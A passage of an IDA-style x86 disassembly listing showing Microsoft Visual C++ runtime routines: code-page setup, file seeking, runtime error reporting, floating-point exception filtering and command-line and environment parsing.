loc_41D34F: ; CODE XREF: sub_41D2FB+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_41D363
mov dword_481328, 1
mov eax, dword_481488
loc_41D363: ; CODE XREF: sub_41D2FB+3B�j
; sub_41D2FB+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_481804
jz loc_41D42D
mov esi, dword_4816E4
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_41D383
cmp [esi], edi
jz short loc_41D393
loc_41D383: ; CODE XREF: sub_41D2FB+82�j
push 220h
call sub_416DAF
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_41D393: ; CODE XREF: sub_41D2FB+86�j
cmp esi, edi
jz short loc_41D416
push [ebp+arg_0]
call sub_41D165
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_41D416
mov [esi], edi
mov eax, dword_481804
mov [esi+4], eax
mov eax, dword_4816E8
mov [esi+8], eax
mov eax, dword_4816E0
mov [esi+0Ch], eax
xor eax, eax
loc_41D3C3: ; CODE XREF: sub_41D2FB+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41D3DB
mov cx, word_481810[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_41D3C3
; ---------------------------------------------------------------------------
loc_41D3DB: ; CODE XREF: sub_41D2FB+CE�j
xor eax, eax
loc_41D3DD: ; CODE XREF: sub_41D2FB+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_41D3F4
mov cl, byte_481700[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41D3DD
; ---------------------------------------------------------------------------
loc_41D3F4: ; CODE XREF: sub_41D2FB+EA�j
xor eax, eax
loc_41D3F6: ; CODE XREF: sub_41D2FB+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_41D410
mov cl, byte_481820[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_41D3F6
; ---------------------------------------------------------------------------
loc_41D410: ; CODE XREF: sub_41D2FB+103�j
mov dword_4816E4, esi
loc_41D416: ; CODE XREF: sub_41D2FB+9A�j
; sub_41D2FB+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_41D430
cmp esi, dword_4816E4
jz short loc_41D430
push esi
call sub_416C97
pop ecx
jmp short loc_41D430
; ---------------------------------------------------------------------------
loc_41D42D: ; CODE XREF: sub_41D2FB+71�j
mov [ebp+var_1C], edi
loc_41D430: ; CODE XREF: sub_41D2FB+11F�j
; sub_41D2FB+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D442
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41D2FB endp
; =============== S U B R O U T I N E =======================================
sub_41D442 proc near ; CODE XREF: sub_41D2FB+139�p
; DATA XREF: .text:stru_42C620�o
push 0Dh
call sub_41A0D2
pop ecx
retn
sub_41D442 endp
; =============== S U B R O U T I N E =======================================
sub_41D44B proc near ; CODE XREF: sub_41DC0B+9�p
; sub_41DC74+D�p ...
cmp dword_482978, 0
jnz short loc_41D466
push 0FFFFFFFDh
call sub_41D2FB
pop ecx
mov dword_482978, 1
loc_41D466: ; CODE XREF: sub_41D44B+7�j
xor eax, eax
retn
sub_41D44B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D469 proc near ; CODE XREF: sub_41802F+2C�p
; sub_41802F+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_41915F
mov eax, [eax+60h]
cmp eax, dword_4816E4
jz short loc_41D488
call sub_41D0F6
loc_41D488: ; CODE XREF: sub_41D469+18�j
cmp dword ptr [eax+8], 0
jnz short loc_41D49F
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_4169C0
add esp, 0Ch
jmp short loc_41D4E7
; ---------------------------------------------------------------------------
loc_41D49F: ; CODE XREF: sub_41D469+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41D4E4
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41D4AB: ; CODE XREF: sub_41D469+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41D4EA
inc edi
inc esi
test ecx, ecx
jz short loc_41D4F6
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_41D4F0
and [edi-2], dl
loc_41D4CE: ; CODE XREF: sub_41D469+85�j
test ecx, ecx
jz short loc_41D4E2
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41D4E2: ; CODE XREF: sub_41D469+67�j
; sub_41D469+8B�j ...
pop esi
pop ebx
loc_41D4E4: ; CODE XREF: sub_41D469+3B�j
mov eax, [ebp+arg_0]
loc_41D4E7: ; CODE XREF: sub_41D469+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D4EA: ; CODE XREF: sub_41D469+4F�j
inc edi
inc esi
test dl, dl
jz short loc_41D4CE
loc_41D4F0: ; CODE XREF: sub_41D469+60�j
test ecx, ecx
jnz short loc_41D4AB
jmp short loc_41D4E2
; ---------------------------------------------------------------------------
loc_41D4F6: ; CODE XREF: sub_41D469+55�j
and byte ptr [edi-1], 0
jmp short loc_41D4E2
sub_41D469 endp
; =============== S U B R O U T I N E =======================================
sub_41D4FC proc near ; CODE XREF: sub_41D5A4+18�p
push esi
push dword_482974
call sub_420705
pop ecx
mov ecx, dword_482970
mov esi, eax
mov eax, dword_482974
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_41D56F
mov ecx, 800h
cmp esi, ecx
jnb short loc_41D52C
mov ecx, esi
loc_41D52C: ; CODE XREF: sub_41D4FC+2C�j
add ecx, esi
push ecx
push eax
call sub_416F93
test eax, eax
pop ecx
pop ecx
jnz short loc_41D552
add esi, 10h
push esi
push dword_482974
call sub_416F93
test eax, eax
pop ecx
pop ecx
jnz short loc_41D552
pop esi
retn
; ---------------------------------------------------------------------------
loc_41D552: ; CODE XREF: sub_41D4FC+3D�j
; sub_41D4FC+52�j
mov ecx, dword_482970
sub ecx, dword_482974
mov dword_482974, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_482970, ecx
loc_41D56F: ; CODE XREF: sub_41D4FC+23�j
mov [ecx], edi
add dword_482970, 4
mov eax, edi
pop esi
retn
sub_41D4FC endp
; =============== S U B R O U T I N E =======================================
sub_41D57C proc near ; DATA XREF: .text:0042E018�o
push 80h
call sub_416DAF
test eax, eax
pop ecx
mov dword_482974, eax
jnz short loc_41D594
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D594: ; CODE XREF: sub_41D57C+12�j
and dword ptr [eax], 0
mov eax, dword_482974
mov dword_482970, eax
xor eax, eax
retn
sub_41D57C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5A4 proc near ; CODE XREF: sub_41D5DC+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_42C630
call __SEH_prolog
call loc_418269
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41D4FC
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D5D6
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41D5A4 endp
; =============== S U B R O U T I N E =======================================
sub_41D5D6 proc near ; CODE XREF: sub_41D5A4+24�p
; DATA XREF: .text:stru_42C630�o
call sub_418272
retn
sub_41D5D6 endp
; =============== S U B R O U T I N E =======================================
sub_41D5DC proc near ; CODE XREF: sub_41827B+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41D5A4
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41D5DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5EE proc near ; CODE XREF: .text:loc_41871F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C640
call __SEH_prolog
mov [ebp+var_1C], offset dword_42CE54
loc_41D601: ; CODE XREF: sub_41D5EE+3C�j
cmp [ebp+var_1C], offset dword_42CE54
jnb short loc_41D62C
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41D622
call eax
jmp short loc_41D622
; ---------------------------------------------------------------------------
loc_41D61B: ; DATA XREF: .text:stru_42C640�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D61F: ; DATA XREF: .text:stru_42C640�o
mov esp, [ebp+ms_exc.old_esp]
loc_41D622: ; CODE XREF: sub_41D5EE+27�j
; sub_41D5EE+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41D601
; ---------------------------------------------------------------------------
loc_41D62C: ; CODE XREF: sub_41D5EE+1A�j
call __SEH_epilog
retn
sub_41D5EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D632 proc near ; DATA XREF: sub_41827B:loc_4182B1�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C650
call __SEH_prolog
mov [ebp+var_1C], offset dword_42CE5C
loc_41D645: ; CODE XREF: sub_41D632+3C�j
cmp [ebp+var_1C], offset dword_42CE5C
jnb short loc_41D670
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41D666
call eax
jmp short loc_41D666
; ---------------------------------------------------------------------------
loc_41D65F: ; DATA XREF: .text:stru_42C650�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D663: ; DATA XREF: .text:stru_42C650�o
mov esp, [ebp+ms_exc.old_esp]
loc_41D666: ; CODE XREF: sub_41D632+27�j
; sub_41D632+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41D645
; ---------------------------------------------------------------------------
loc_41D670: ; CODE XREF: sub_41D632+1A�j
call __SEH_epilog
retn
sub_41D632 endp
; =============== S U B R O U T I N E =======================================
sub_41D676 proc near ; CODE XREF: sub_41B217+18B�p
; sub_41D6EA+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41F50B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41D697
call sub_41B935
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41D697: ; CODE XREF: sub_41D676+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_422090 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41D6B8
call dword_422004 ; RtlGetLastWin32Error
jmp short loc_41D6BA
; ---------------------------------------------------------------------------
loc_41D6B8: ; CODE XREF: sub_41D676+38�j
xor eax, eax
loc_41D6BA: ; CODE XREF: sub_41D676+40�j
test eax, eax
jz short loc_41D6CA
push eax
call sub_41B947
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41D6E7
; ---------------------------------------------------------------------------
loc_41D6CA: ; CODE XREF: sub_41D676+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_41D6E7: ; CODE XREF: sub_41D676+52�j
pop edi
pop esi
retn
sub_41D676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6EA proc near ; CODE XREF: sub_4184E8+69�p
; sub_418805+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041D779 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C660
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815D0
jnb short loc_41D779
mov eax, ebx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41D779
push ebx
call sub_41F54C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41D749
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41D676
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41D760
; ---------------------------------------------------------------------------
loc_41D749: ; CODE XREF: sub_41D6EA+49�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41D760: ; CODE XREF: sub_41D6EA+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D771
mov eax, [ebp+var_1C]
jmp short loc_41D78F
sub_41D6EA endp
; =============== S U B R O U T I N E =======================================
sub_41D76E proc near ; DATA XREF: .text:stru_42C660�o
mov ebx, [ebp+8]
sub_41D76E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D771 proc near ; CODE XREF: sub_41D6EA+7A�p
push ebx
call sub_41F5BF
pop ecx
retn
sub_41D771 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D6EA
loc_41D779: ; CODE XREF: sub_41D6EA+15�j
; sub_41D6EA+35�j
call sub_41B935
mov dword ptr [eax], 9
call sub_41B93E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41D78F: ; CODE XREF: sub_41D6EA+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41D6EA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D795 proc near ; CODE XREF: sub_4184E8+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41D7B1
mov [edi+4], ebx
loc_41D7B1: ; CODE XREF: sub_41D795+17�j
push 1
push ebx
push esi
call sub_41D6EA
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41D832
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_41D7D6
sub eax, [edi+4]
jmp loc_41D8F2
; ---------------------------------------------------------------------------
loc_41D7D6: ; CODE XREF: sub_41D795+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_41D823
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_4815E0[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_41D815
mov ecx, edx
cmp ecx, eax
jnb short loc_41D815
loc_41D808: ; CODE XREF: sub_41D795+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_41D810
inc [ebp+var_8]
loc_41D810: ; CODE XREF: sub_41D795+76�j
inc ecx
cmp ecx, [edi]
jb short loc_41D808
loc_41D815: ; CODE XREF: sub_41D795+6B�j
; sub_41D795+71�j ...
cmp [ebp+var_4], 0
jnz short loc_41D83A
mov eax, [ebp+var_8]
jmp loc_41D8F2
; ---------------------------------------------------------------------------
loc_41D823: ; CODE XREF: sub_41D795+50�j
test cl, cl
js short loc_41D815
call sub_41B935
mov dword ptr [eax], 16h
loc_41D832: ; CODE XREF: sub_41D795+2D�j
or eax, 0FFFFFFFFh
jmp loc_41D8F2
; ---------------------------------------------------------------------------
loc_41D83A: ; CODE XREF: sub_41D795+84�j
test byte ptr [edi+0Ch], 1
jz loc_41D8EA
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_41D853
and [ebp+var_8], ecx
jmp loc_41D8EA
; ---------------------------------------------------------------------------
loc_41D853: ; CODE XREF: sub_41D795+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:4815E0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_41D8E4
push 2
push 0
push [ebp+var_C]
call sub_41D6EA
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41D8AB
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_41D8A1
; ---------------------------------------------------------------------------
loc_41D898: ; CODE XREF: sub_41D795+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_41D8A0
inc [ebp+arg_0]
loc_41D8A0: ; CODE XREF: sub_41D795+106�j
inc eax
loc_41D8A1: ; CODE XREF: sub_41D795+101�j
cmp eax, ecx
jb short loc_41D898
test byte ptr [edi+0Dh], 20h
jmp short loc_41D8DF
; ---------------------------------------------------------------------------
loc_41D8AB: ; CODE XREF: sub_41D795+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41D6EA
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41D8D2
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41D8D2
test ch, 4
jz short loc_41D8D5
loc_41D8D2: ; CODE XREF: sub_41D795+12E�j
; sub_41D795+136�j
mov eax, [edi+18h]
loc_41D8D5: ; CODE XREF: sub_41D795+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41D8DF: ; CODE XREF: sub_41D795+114�j
jz short loc_41D8E4
inc [ebp+arg_0]
loc_41D8E4: ; CODE XREF: sub_41D795+E3�j
; sub_41D795:loc_41D8DF�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41D8EA: ; CODE XREF: sub_41D795+A9�j
; sub_41D795+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41D8F2: ; CODE XREF: sub_41D795+3C�j
; sub_41D795+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D795 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D8F7 proc near ; CODE XREF: sub_4185EA+12�p
; sub_41860F+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_432A48
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_41D915: ; CODE XREF: sub_41D8F7+2B�j
cmp ecx, dword_432B58[eax*8]
jz short loc_41D924
inc eax
cmp eax, 12h
jb short loc_41D915
loc_41D924: ; CODE XREF: sub_41D8F7+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_432B58[esi]
jnz loc_41DA58
mov eax, dword_4811B0
cmp eax, 1
jz loc_41DA33
cmp eax, edx
jnz short loc_41D954
cmp dword_432364, 1
jz loc_41DA33
loc_41D954: ; CODE XREF: sub_41D8F7+4E�j
cmp ecx, 0FCh
jz loc_41DA58
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call dword_42200C ; GetModuleFileNameA
test eax, eax
jnz short loc_41D98D
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41BF70
pop ecx
pop ecx
loc_41D98D: ; CODE XREF: sub_41D8F7+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_419D00
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41D9CF
lea eax, [ebp+var_10C]
push eax
call sub_419D00
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4169C0
add esp, 10h
loc_41D9CF: ; CODE XREF: sub_41D8F7+AD�j
push edi
call sub_419D00
push off_432B5C[esi]
mov ebx, eax
call sub_419D00
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_416B20
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_41BF70
push edi
push ebx
call sub_41BF80
push offset asc_42C990 ; "\n\n"
push ebx
call sub_41BF80
push off_432B5C[esi]
push ebx
call sub_41BF80
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_42077B
add esp, 2Ch
jmp short loc_41DA58
; ---------------------------------------------------------------------------
loc_41DA33: ; CODE XREF: sub_41D8F7+46�j
; sub_41D8F7+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_432B5C[esi]
push dword ptr [esi]
call sub_419D00
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4221B8 ; GetStdHandle
push eax
call dword_422030 ; WriteFile
loc_41DA58: ; CODE XREF: sub_41D8F7+38�j
; sub_41D8F7+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41C526
pop edi
pop esi
pop ebx
leave
retn
sub_41D8F7 endp
; =============== S U B R O U T I N E =======================================
sub_41DA6E proc near ; CODE XREF: sub_4185EA+9�p
; sub_41860F+9�p
mov eax, dword_4811B0
cmp eax, 1
jz short loc_41DA85
test eax, eax
jnz short locret_41DAA6
cmp dword_432364, 1
jnz short locret_41DAA6
loc_41DA85: ; CODE XREF: sub_41DA6E+8�j
push 0FCh
call sub_41D8F7
mov eax, dword_48132C
test eax, eax
pop ecx
jz short loc_41DA9B
call eax
loc_41DA9B: ; CODE XREF: sub_41DA6E+29�j
push 0FFh
call sub_41D8F7
pop ecx
locret_41DAA6: ; CODE XREF: sub_41DA6E+C�j
; sub_41DA6E+15�j
retn
sub_41DA6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DAA7 proc near ; CODE XREF: .text:004187D7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_41915F
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_432C6C
mov ecx, edx
loc_41DAC2: ; CODE XREF: sub_41DAA7+2A�j
cmp [ecx], edi
jz short loc_41DAD3
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41DAC2
loc_41DAD3: ; CODE XREF: sub_41DAA7+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41DAE1
cmp [ecx], edi
jz short loc_41DAE3
loc_41DAE1: ; CODE XREF: sub_41DAA7+34�j
xor ecx, ecx
loc_41DAE3: ; CODE XREF: sub_41DAA7+38�j
test ecx, ecx
jz loc_41DBFD
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41DBFD
cmp ebx, 5
jnz short loc_41DB0A
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41DC06
; ---------------------------------------------------------------------------
loc_41DB0A: ; CODE XREF: sub_41DAA7+55�j
cmp ebx, 1
jz loc_41DBF8
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41DBEA
mov edx, dword_432C60
mov eax, dword_432C64
add eax, edx
cmp edx, eax
jge short loc_41DB63
lea eax, [edx+edx*2]
shl eax, 2
loc_41DB42: ; CODE XREF: sub_41DAA7+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_432C60
mov ebx, dword_432C64
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41DB42
mov ebx, [ebp+arg_0]
loc_41DB63: ; CODE XREF: sub_41DAA7+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41DB79
mov dword ptr [esi+5Ch], 83h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DB79: ; CODE XREF: sub_41DAA7+C7�j
cmp ecx, 0C0000090h
jnz short loc_41DB8A
mov dword ptr [esi+5Ch], 81h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DB8A: ; CODE XREF: sub_41DAA7+D8�j
cmp ecx, 0C0000091h
jnz short loc_41DB9B
mov dword ptr [esi+5Ch], 84h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DB9B: ; CODE XREF: sub_41DAA7+E9�j
cmp ecx, 0C0000093h
jnz short loc_41DBAC
mov dword ptr [esi+5Ch], 85h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DBAC: ; CODE XREF: sub_41DAA7+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41DBBD
mov dword ptr [esi+5Ch], 82h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DBBD: ; CODE XREF: sub_41DAA7+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41DBCE
mov dword ptr [esi+5Ch], 86h
jmp short loc_41DBDD
; ---------------------------------------------------------------------------
loc_41DBCE: ; CODE XREF: sub_41DAA7+11C�j
cmp ecx, 0C0000092h
jnz short loc_41DBDD
mov dword ptr [esi+5Ch], 8Ah
loc_41DBDD: ; CODE XREF: sub_41DAA7+D0�j
; sub_41DAA7+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41DBF1
; ---------------------------------------------------------------------------
loc_41DBEA: ; CODE XREF: sub_41DAA7+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41DBF1: ; CODE XREF: sub_41DAA7+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41DBF8: ; CODE XREF: sub_41DAA7+66�j
or eax, 0FFFFFFFFh
jmp short loc_41DC06
; ---------------------------------------------------------------------------
loc_41DBFD: ; CODE XREF: sub_41DAA7+3E�j
; sub_41DAA7+4C�j
push [ebp+arg_4]
call dword_4221BC ; UnhandledExceptionFilter
loc_41DC06: ; CODE XREF: sub_41DAA7+5E�j
; sub_41DAA7+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DAA7 endp
; =============== S U B R O U T I N E =======================================
sub_41DC0B proc near ; CODE XREF: .text:0041878F�p
cmp dword_482978, 0
jnz short loc_41DC19
call sub_41D44B
loc_41DC19: ; CODE XREF: sub_41DC0B+7�j
push esi
mov esi, dword_482968
test esi, esi
jnz short loc_41DC2B
mov esi, 422B0Ah
jmp short loc_41DC70
; ---------------------------------------------------------------------------
loc_41DC2B: ; CODE XREF: sub_41DC0B+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41DC59
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41DC69
loc_41DC38: ; CODE XREF: sub_41DC0B+45�j
test al, al
jz short loc_41DC52
movzx eax, al
push eax
call sub_4208A5
test eax, eax
pop ecx
jz short loc_41DC4B
inc esi
loc_41DC4B: ; CODE XREF: sub_41DC0B+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41DC38
loc_41DC52: ; CODE XREF: sub_41DC0B+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41DC6A
jmp short loc_41DC69
; ---------------------------------------------------------------------------
loc_41DC59: ; CODE XREF: sub_41DC0B+24�j
cmp al, 20h
jbe short loc_41DC6A
loc_41DC5D: ; CODE XREF: sub_41DC0B+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41DC5D
jmp short loc_41DC6A
; ---------------------------------------------------------------------------
loc_41DC65: ; CODE XREF: sub_41DC0B+63�j
cmp al, 20h
ja short loc_41DC70
loc_41DC69: ; CODE XREF: sub_41DC0B+2B�j
; sub_41DC0B+4C�j
inc esi
loc_41DC6A: ; CODE XREF: sub_41DC0B+4A�j
; sub_41DC0B+50�j ...
mov al, [esi]
test al, al
jnz short loc_41DC65
loc_41DC70: ; CODE XREF: sub_41DC0B+1E�j
; sub_41DC0B+5C�j
mov eax, esi
pop esi
retn
sub_41DC0B endp
; =============== S U B R O U T I N E =======================================
sub_41DC74 proc near ; CODE XREF: .text:loc_41875E�p
push ebx
xor ebx, ebx
cmp dword_482978, ebx
push esi
push edi
jnz short loc_41DC86
call sub_41D44B
loc_41DC86: ; CODE XREF: sub_41DC74+B�j
mov esi, dword_4811A8
xor edi, edi
cmp esi, ebx
jnz short loc_41DCA4
jmp short loc_41DCC4
; ---------------------------------------------------------------------------
loc_41DC94: ; CODE XREF: sub_41DC74+34�j
cmp al, 3Dh
jz short loc_41DC99
inc edi
loc_41DC99: ; CODE XREF: sub_41DC74+22�j
push esi
call sub_419D00
pop ecx
lea esi, [esi+eax+1]
loc_41DCA4: ; CODE XREF: sub_41DC74+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41DC94
lea eax, ds:4[edi*4]
push eax
call sub_416DAF
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_481184, edi
jnz short loc_41DCC9
loc_41DCC4: ; CODE XREF: sub_41DC74+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41DD21
; ---------------------------------------------------------------------------
